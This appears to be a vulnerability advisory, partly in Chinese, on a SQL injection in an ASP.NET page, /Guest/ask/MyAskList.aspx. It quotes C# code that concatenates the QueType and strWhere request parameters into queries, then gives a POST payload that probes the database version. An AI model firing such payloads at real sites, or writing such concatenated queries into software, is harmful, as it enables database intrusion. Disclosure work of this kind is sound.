<p>/Guest/ask/MyAskList.aspx</p><pre class="">protected void Page_Load(object sender, EventArgs e) { string str = ""; if (!base.IsPostBack) { DataTable table; if (this.b_User.CheckLogin()) { this.user.Text = this.b_User.GetLogin().UserName; string userName = this.b_User.GetLogin().UserName; str = " And UserName<>'" + userName + "'"; } if (!string.IsNullOrEmpty(base.Request["strWhere"])) { table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTim e desc"); } else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"])) { table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc"); } else { table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc"); } string str3 = ""; string item = ""; IList<string> list = new List<string>(); Repeater repeater = new Repeater(); if (table != null) { foreach (DataRow row in...
<p>/Guest/ask/MyAskList.aspx</p><pre class="">protected void Page_Load(object sender, EventArgs e) { string str = ""; if (!base.IsPostBack) { DataTable table; if (this.b_User.CheckLogin()) { this.user.Text = this.b_User.GetLogin().UserName; string userName = this.b_User.GetLogin().UserName; str = " And UserName<>'" + userName + "'"; } if (!string.IsNullOrEmpty(base.Request["strWhere"])) { table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTim e desc"); } else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"])) { table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc"); } else { table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc"); } string str3 = ""; string item = ""; IList<string> list = new List<string>(); Repeater repeater = new Repeater(); if (table != null) { foreach (DataRow row in table.Rows) { if (string.IsNullOrEmpty(str3)) { item = row["Qcontent"].ToString(); list.Add(item); } } } repeater.DataSource = list; repeater.DataBind(); if (table != null) { this.Bind(table); } if (table != null) { table.Dispose(); } list.Clear(); } } </pre><p>able = this.b_Ask.Sel("QueType LIKE '%" +base.Request["QueType"] + "%' " + str + " AndStatus=1", " AddTime desc");</p><p>这里QueType也没处理直接传入数据库,导致SQL注入</p><p><br></p><p><br></p><p>漏洞利用过程</p><p>访问</p><p><a href="http://xxx.com/Guest/ask/" rel="nofollow">http://xxx.com/Guest/ask/</a>MyAskList.aspx</p><p>post提交</p><p>QueType='and (select @@version)>0 and '%'=' </p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434685163694-1.png" data-image-size="865,701"><br></p>
